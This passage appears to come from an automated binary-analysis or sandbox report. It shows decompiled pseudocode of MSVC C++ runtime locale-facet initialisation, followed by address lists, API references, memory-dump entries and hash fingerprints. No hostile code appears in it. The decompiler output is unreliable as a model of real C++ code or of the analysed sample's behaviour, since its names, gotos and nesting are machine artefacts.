                                                                                                																																																				asm("int3");
                                                                                                																																																				_push(8);
                                                                                                																																																				E00FB38B2(0xfb6ebe, _t637, _t655);
                                                                                                																																																				E00F856E6( &_v20, 0);
                                                                                                																																																				_t656 =  *0xfd0b1c; // 0x0
                                                                                                																																																				_v4 = _v4 & 0x00000000;
                                                                                                																																																				_v16 = _t656;
                                                                                                																																																				_t638 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																				__eflags = _t638;
                                                                                                																																																				if(_t638 != 0) {
                                                                                                																																																					L117:
                                                                                                																																																					E00F8573E( &_v20);
                                                                                                																																																					return E00FB388C(_t638);
                                                                                                																																																				} else {
                                                                                                																																																					__eflags = _t656;
                                                                                                																																																					if(__eflags == 0) {
                                                                                                																																																						_push(_a8);
                                                                                                																																																						_push( &_v16);
                                                                                                																																																						_t394 = E00F88C91(_t638, _t656, __eflags);
                                                                                                																																																						_pop(_t568);
                                                                                                																																																						__eflags = _t394 - 0xffffffff;
                                                                                                																																																						if(__eflags == 0) {
                                                                                                																																																							E00F78FE0(__eflags);
                                                                                                																																																							asm("int3");
                                                                                                																																																							_push(_t656);
                                                                                                																																																							_t657 = _t568;
                                                                                                																																																							_t206 = _t657 + 0x10;
                                                                                                																																																							 *_t206 =  *(_t657 + 0x10) & 0x00000000;
                                                                                                																																																							__eflags =  *_t206;
                                                                                                																																																							 *((intOrPtr*)(_t657 + 0x14)) = 7;
                                                                                                																																																							 *_t657 = 0;
                                                                                                																																																							E00F8D9F3(_v64);
                                                                                                																																																							return _t657;
                                                                                                																																																						} else {
                                                                                                																																																							_t638 = _v16;
                                                                                                																																																							_v16 = _t638;
                                                                                                																																																							_v4 = 1;
                                                                                                																																																							E00F85472(_t638);
                                                                                                																																																							 *0xfb81fc();
                                                                                                																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
                                                                                                																																																							 *0xfd0b1c = _t638;
                                                                                                																																																							goto L117;
                                                                                                																																																						}
                                                                                                																																																					} else {
                                                                                                																																																						_t638 = _t656;
                                                                                                																																																						goto L117;
                                                                                                																																																					}
                                                                                                																																																				}
                                                                                                																																																			} else {
                                                                                                																																																				_t637 = _v16;
                                                                                                																																																				_v16 = _t637;
                                                                                                																																																				_v4 = 1;
                                                                                                																																																				E00F85472(_t637);
                                                                                                																																																				 *0xfb81fc();
                                                                                                																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
                                                                                                																																																				 *0xfd0ae8 = _t637;
                                                                                                																																																				goto L110;
                                                                                                																																																			}
                                                                                                																																																		} else {
                                                                                                																																																			_t637 = _t655;
                                                                                                																																																			goto L110;
                                                                                                																																																		}
                                                                                                																																																	}
                                                                                                																																																} else {
                                                                                                																																																	_t636 = _v16;
                                                                                                																																																	_v16 = _t636;
                                                                                                																																																	_v4 = 1;
                                                                                                																																																	E00F85472(_t636);
                                                                                                																																																	 *0xfb81fc();
                                                                                                																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
                                                                                                																																																	 *0xfd0b18 = _t636;
                                                                                                																																																	goto L103;
                                                                                                																																																}
                                                                                                																																															} else {
                                                                                                																																																_t636 = _t654;
                                                                                                																																																goto L103;
                                                                                                																																															}
                                                                                                																																														}
                                                                                                																																													} else {
                                                                                                																																														_t635 = _v16;
                                                                                                																																														_v16 = _t635;
                                                                                                																																														_v4 = 1;
                                                                                                																																														E00F85472(_t635);
                                                                                                																																														 *0xfb81fc();
                                                                                                																																														 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
                                                                                                																																														 *0xfd0afc = _t635;
                                                                                                																																														goto L96;
                                                                                                																																													}
                                                                                                																																												} else {
                                                                                                																																													_t635 = _t653;
                                                                                                																																													goto L96;
                                                                                                																																												}
                                                                                                																																											}
                                                                                                																																										} else {
                                                                                                																																											_t634 = _v16;
                                                                                                																																											_v16 = _t634;
                                                                                                																																											_v4 = 1;
                                                                                                																																											E00F85472(_t634);
                                                                                                																																											 *0xfb81fc();
                                                                                                																																											 *((intOrPtr*)( *((intOrPtr*)( *_t634 + 4))))();
                                                                                                																																											 *0xfd0af8 = _t634;
                                                                                                																																											goto L89;
                                                                                                																																										}
                                                                                                																																									} else {
                                                                                                																																										_t634 = _t652;
                                                                                                																																										goto L89;
                                                                                                																																									}
                                                                                                																																								}
                                                                                                																																							} else {
                                                                                                																																								_t633 = _v16;
                                                                                                																																								_v16 = _t633;
                                                                                                																																								_v4 = 1;
                                                                                                																																								E00F85472(_t633);
                                                                                                																																								 *0xfb81fc();
                                                                                                																																								 *((intOrPtr*)( *((intOrPtr*)( *_t633 + 4))))();
                                                                                                																																								 *0xfd0af4 = _t633;
                                                                                                																																								goto L82;
                                                                                                																																							}
                                                                                                																																						} else {
                                                                                                																																							_t633 = _t651;
                                                                                                																																							goto L82;
                                                                                                																																						}
                                                                                                																																					}
                                                                                                																																				} else {
                                                                                                																																					_t632 = _v16;
                                                                                                																																					_v16 = _t632;
                                                                                                																																					_v4 = 1;
                                                                                                																																					E00F85472(_t632);
                                                                                                																																					 *0xfb81fc();
                                                                                                																																					 *((intOrPtr*)( *((intOrPtr*)( *_t632 + 4))))();
                                                                                                																																					 *0xfd0ae0 = _t632;
                                                                                                																																					goto L75;
                                                                                                																																				}
                                                                                                																																			} else {
                                                                                                																																				_t632 = _t650;
                                                                                                																																				goto L75;
                                                                                                																																			}
                                                                                                																																		}
                                                                                                																																	} else {
                                                                                                																																		_t631 = _v16;
                                                                                                																																		_v16 = _t631;
                                                                                                																																		_v4 = 1;
                                                                                                																																		E00F85472(_t631);
                                                                                                																																		 *0xfb81fc();
                                                                                                																																		 *((intOrPtr*)( *((intOrPtr*)( *_t631 + 4))))();
                                                                                                																																		 *0xfd0ae4 = _t631;
                                                                                                																																		goto L68;
                                                                                                																																	}
                                                                                                																																} else {
                                                                                                																																	_t631 = _t649;
                                                                                                																																	goto L68;
                                                                                                																																}
                                                                                                																															}
                                                                                                																														} else {
                                                                                                																															_t630 = _v16;
                                                                                                																															_v16 = _t630;
                                                                                                																															_v4 = 1;
                                                                                                																															E00F85472(_t630);
                                                                                                																															 *0xfb81fc();
                                                                                                																															 *((intOrPtr*)( *((intOrPtr*)( *_t630 + 4))))();
                                                                                                																															 *0xfd0b10 = _t630;
                                                                                                																															goto L61;
                                                                                                																														}
                                                                                                																													} else {
                                                                                                																														_t630 = _t648;
                                                                                                																														goto L61;
                                                                                                																													}
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												_t629 = _v16;
                                                                                                																												_v16 = _t629;
                                                                                                																												_v4 = 1;
                                                                                                																												E00F85472(_t629);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t629 + 4))))();
                                                                                                																												 *0xfd0b14 = _t629;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t629 = _t647;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t628 = _v16;
                                                                                                																									_v16 = _t628;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t628);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t628 + 4))))();
                                                                                                																									 *0xfd0adc = _t628;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t628 = _t646;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t627 = _v16;
                                                                                                																						_v16 = _t627;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t627);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t627 + 4))))();
                                                                                                																						 *0xfd0b0c = _t627;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t627 = _t645;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t626 = _v16;
                                                                                                																			_v16 = _t626;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t626);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t626 + 4))))();
                                                                                                																			 *0xfd0ad8 = _t626;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t626 = _t644;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t625 = _v16;
                                                                                                																_v16 = _t625;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t625);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t625 + 4))))();
                                                                                                																 *0xfd0b08 = _t625;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t625 = _t643;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t624 = _v16;
                                                                                                													_v16 = _t624;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t624);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t624 + 4))))();
                                                                                                													 *0xfd0ad4 = _t624;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t624 = _t642;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t623 = _v16;
                                                                                                										_v16 = _t623;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t623);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t623 + 4))))();
                                                                                                										 *0xfd0b04 = _t623;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t623 = _t641;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t622 = _v16;
                                                                                                							_v16 = _t622;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t622);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t622 + 4))))();
                                                                                                							 *0xfd0af0 = _t622;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t622 = _t640;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}













































                                                                                                0x00f8709a
                                                                                                0x00f870a1
                                                                                                0x00f870ab
                                                                                                0x00f870b0
                                                                                                0x00f870bb
                                                                                                0x00f870bf
                                                                                                0x00f870cb
                                                                                                0x00f870d0
                                                                                                0x00f870d4
                                                                                                0x00f87119
                                                                                                0x00f8711c
                                                                                                0x00f87128
                                                                                                0x00f870d6
                                                                                                0x00f870d8
                                                                                                0x00f870de
                                                                                                0x00f870e4
                                                                                                0x00f870ec
                                                                                                0x00f870ef
                                                                                                0x00f87129
                                                                                                0x00f8712e
                                                                                                0x00f8712f
                                                                                                0x00f87136
                                                                                                0x00f87140
                                                                                                0x00f87145
                                                                                                0x00f87150
                                                                                                0x00f87154
                                                                                                0x00f87165
                                                                                                0x00f87167
                                                                                                0x00f87169
                                                                                                0x00f871ae
                                                                                                0x00f871b1
                                                                                                0x00f871bd
                                                                                                0x00f8716b
                                                                                                0x00f8716b
                                                                                                0x00f8716d
                                                                                                0x00f87173
                                                                                                0x00f87179
                                                                                                0x00f87181
                                                                                                0x00f87184
                                                                                                0x00f871be
                                                                                                0x00f871c3
                                                                                                0x00f871c4
                                                                                                0x00f871cb
                                                                                                0x00f871d5
                                                                                                0x00f871da
                                                                                                0x00f871e5
                                                                                                0x00f871e9
                                                                                                0x00f871fa
                                                                                                0x00f871fc
                                                                                                0x00f871fe
                                                                                                0x00f87243
                                                                                                0x00f87246
                                                                                                0x00f87252
                                                                                                0x00f87200
                                                                                                0x00f87200
                                                                                                0x00f87202
                                                                                                0x00f87208
                                                                                                0x00f8720e
                                                                                                0x00f87216
                                                                                                0x00f87219
                                                                                                0x00f87253
                                                                                                0x00f87258
                                                                                                0x00f87259
                                                                                                0x00f87260
                                                                                                0x00f8726a
                                                                                                0x00f8726f
                                                                                                0x00f8727a
                                                                                                0x00f8727e
                                                                                                0x00f8728f
                                                                                                0x00f87291
                                                                                                0x00f87293
                                                                                                0x00f872d8
                                                                                                0x00f872db
                                                                                                0x00f872e7
                                                                                                0x00f87295
                                                                                                0x00f87295
                                                                                                0x00f87297
                                                                                                0x00f8729d
                                                                                                0x00f872a3
                                                                                                0x00f872ab
                                                                                                0x00f872ae
                                                                                                0x00f872e8
                                                                                                0x00f872ed
                                                                                                0x00f872ee
                                                                                                0x00f872f5
                                                                                                0x00f872ff
                                                                                                0x00f87304
                                                                                                0x00f8730f
                                                                                                0x00f87313
                                                                                                0x00f87324
                                                                                                0x00f87326
                                                                                                0x00f87328
                                                                                                0x00f8736d
                                                                                                0x00f87370
                                                                                                0x00f8737c
                                                                                                0x00f8732a
                                                                                                0x00f8732a
                                                                                                0x00f8732c
                                                                                                0x00f87332
                                                                                                0x00f87338
                                                                                                0x00f87340
                                                                                                0x00f87343
                                                                                                0x00f8737d
                                                                                                0x00f87382
                                                                                                0x00f87383
                                                                                                0x00f8738a
                                                                                                0x00f87394
                                                                                                0x00f87399
                                                                                                0x00f873a4
                                                                                                0x00f873a8
                                                                                                0x00f873b9
                                                                                                0x00f873bb
                                                                                                0x00f873bd
                                                                                                0x00f87402
                                                                                                0x00f87405
                                                                                                0x00f87411
                                                                                                0x00f873bf
                                                                                                0x00f873bf
                                                                                                0x00f873c1
                                                                                                0x00f873c7
                                                                                                0x00f873cd
                                                                                                0x00f873d5
                                                                                                0x00f873d8
                                                                                                0x00f87412
                                                                                                0x00f87417
                                                                                                0x00f87418
                                                                                                0x00f8741f
                                                                                                0x00f87429
                                                                                                0x00f8742e
                                                                                                0x00f87439
                                                                                                0x00f8743d
                                                                                                0x00f8744e
                                                                                                0x00f87450
                                                                                                0x00f87452
                                                                                                0x00f87497
                                                                                                0x00f8749a
                                                                                                0x00f874a6
                                                                                                0x00f87454
                                                                                                0x00f87454
                                                                                                0x00f87456
                                                                                                0x00f8745c
                                                                                                0x00f87462
                                                                                                0x00f8746a
                                                                                                0x00f8746d
                                                                                                0x00f874a7
                                                                                                0x00f874ac
                                                                                                0x00f874ad
                                                                                                0x00f874b4
                                                                                                0x00f874be
                                                                                                0x00f874c3
                                                                                                0x00f874ce
                                                                                                0x00f874d2
                                                                                                0x00f874e3
                                                                                                0x00f874e5
                                                                                                0x00f874e7
                                                                                                0x00f8752c
                                                                                                0x00f8752f
                                                                                                0x00f8753b
                                                                                                0x00f874e9
                                                                                                0x00f874e9
                                                                                                0x00f874eb
                                                                                                0x00f874f1
                                                                                                0x00f874f7
                                                                                                0x00f874ff
                                                                                                0x00f87502
                                                                                                0x00f8753c
                                                                                                0x00f87541
                                                                                                0x00f87542
                                                                                                0x00f87549
                                                                                                0x00f87553
                                                                                                0x00f87558
                                                                                                0x00f87563
                                                                                                0x00f87567
                                                                                                0x00f87578
                                                                                                0x00f8757a
                                                                                                0x00f8757c
                                                                                                0x00f875c1
                                                                                                0x00f875c4
                                                                                                0x00f875d0
                                                                                                0x00f8757e
                                                                                                0x00f8757e
                                                                                                0x00f87580
                                                                                                0x00f87586
                                                                                                0x00f8758c
                                                                                                0x00f87594
                                                                                                0x00f87597
                                                                                                0x00f875d1
                                                                                                0x00f875d6
                                                                                                0x00f875d7
                                                                                                0x00f875de
                                                                                                0x00f875e8
                                                                                                0x00f875ed
                                                                                                0x00f875f8
                                                                                                0x00f875fc
                                                                                                0x00f8760d
                                                                                                0x00f8760f
                                                                                                0x00f87611
                                                                                                0x00f87656
                                                                                                0x00f87659
                                                                                                0x00f87665
                                                                                                0x00f87613
                                                                                                0x00f87613
                                                                                                0x00f87615
                                                                                                0x00f8761b
                                                                                                0x00f87621
                                                                                                0x00f87629
                                                                                                0x00f8762c
                                                                                                0x00f87666
                                                                                                0x00f8766b
                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f876a2
                                                                                                0x00f876a4
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb
                                                                                                0x00f8746f
                                                                                                0x00f8746f
                                                                                                0x00f87472
                                                                                                0x00f87476
                                                                                                0x00f8747a
                                                                                                0x00f87487
                                                                                                0x00f8748f
                                                                                                0x00f87491
                                                                                                0x00000000
                                                                                                0x00f87491
                                                                                                0x00f87458
                                                                                                0x00f87458
                                                                                                0x00000000
                                                                                                0x00f87458
                                                                                                0x00f87456
                                                                                                0x00f873da
                                                                                                0x00f873da
                                                                                                0x00f873dd
                                                                                                0x00f873e1
                                                                                                0x00f873e5
                                                                                                0x00f873f2
                                                                                                0x00f873fa
                                                                                                0x00f873fc
                                                                                                0x00000000
                                                                                                0x00f873fc
                                                                                                0x00f873c3
                                                                                                0x00f873c3
                                                                                                0x00000000
                                                                                                0x00f873c3
                                                                                                0x00f873c1
                                                                                                0x00f87345
                                                                                                0x00f87345
                                                                                                0x00f87348
                                                                                                0x00f8734c
                                                                                                0x00f87350
                                                                                                0x00f8735d
                                                                                                0x00f87365
                                                                                                0x00f87367
                                                                                                0x00000000
                                                                                                0x00f87367
                                                                                                0x00f8732e
                                                                                                0x00f8732e
                                                                                                0x00000000
                                                                                                0x00f8732e
                                                                                                0x00f8732c
                                                                                                0x00f872b0
                                                                                                0x00f872b0
                                                                                                0x00f872b3
                                                                                                0x00f872b7
                                                                                                0x00f872bb
                                                                                                0x00f872c8
                                                                                                0x00f872d0
                                                                                                0x00f872d2
                                                                                                0x00000000
                                                                                                0x00f872d2
                                                                                                0x00f87299
                                                                                                0x00f87299
                                                                                                0x00000000
                                                                                                0x00f87299
                                                                                                0x00f87297
                                                                                                0x00f8721b
                                                                                                0x00f8721b
                                                                                                0x00f8721e
                                                                                                0x00f87222
                                                                                                0x00f87226
                                                                                                0x00f87233
                                                                                                0x00f8723b
                                                                                                0x00f8723d
                                                                                                0x00000000
                                                                                                0x00f8723d
                                                                                                0x00f87204
                                                                                                0x00f87204
                                                                                                0x00000000
                                                                                                0x00f87204
                                                                                                0x00f87202
                                                                                                0x00f87186
                                                                                                0x00f87186
                                                                                                0x00f87189
                                                                                                0x00f8718d
                                                                                                0x00f87191
                                                                                                0x00f8719e
                                                                                                0x00f871a6
                                                                                                0x00f871a8
                                                                                                0x00000000
                                                                                                0x00f871a8
                                                                                                0x00f8716f
                                                                                                0x00f8716f
                                                                                                0x00000000
                                                                                                0x00f8716f
                                                                                                0x00f8716d
                                                                                                0x00f870f1
                                                                                                0x00f870f1
                                                                                                0x00f870f4
                                                                                                0x00f870f8
                                                                                                0x00f870fc
                                                                                                0x00f87109
                                                                                                0x00f87111
                                                                                                0x00f87113
                                                                                                0x00000000
                                                                                                0x00f87113
                                                                                                0x00f870da
                                                                                                0x00f870da
                                                                                                0x00000000
                                                                                                0x00f870da
                                                                                                0x00f870d8

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F870A1
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F870AB
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • ctype.LIBCPMT ref: 00F870E5
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F870FC
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F8711C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                • String ID:
                                                                                                • API String ID: 83828444-0
                                                                                                • Opcode ID: 938da0498e9ce21009aab58fc42447d98348b22b4851b7e4a344233314421b48
                                                                                                • Instruction ID: 9e551f4d8dadd63969088f8b7f332a9707ecd78254642875b9553d86102ad2e9
                                                                                                • Opcode Fuzzy Hash: 938da0498e9ce21009aab58fc42447d98348b22b4851b7e4a344233314421b48
                                                                                                • Instruction Fuzzy Hash: 3201A13594462A9BCB05FB64CC05BEE7761AF84760F24410AF4156B292DF78DE02AB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F8782B(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				intOrPtr _v12;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				signed int _t57;
                                                                                                				void* _t95;
                                                                                                				short* _t139;
                                                                                                				void* _t152;
                                                                                                				signed int _t155;
                                                                                                				signed int _t156;
                                                                                                				signed int _t157;
                                                                                                				signed int _t159;
                                                                                                				signed int _t160;
                                                                                                				signed int _t161;
                                                                                                				signed int _t162;
                                                                                                				short* _t163;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
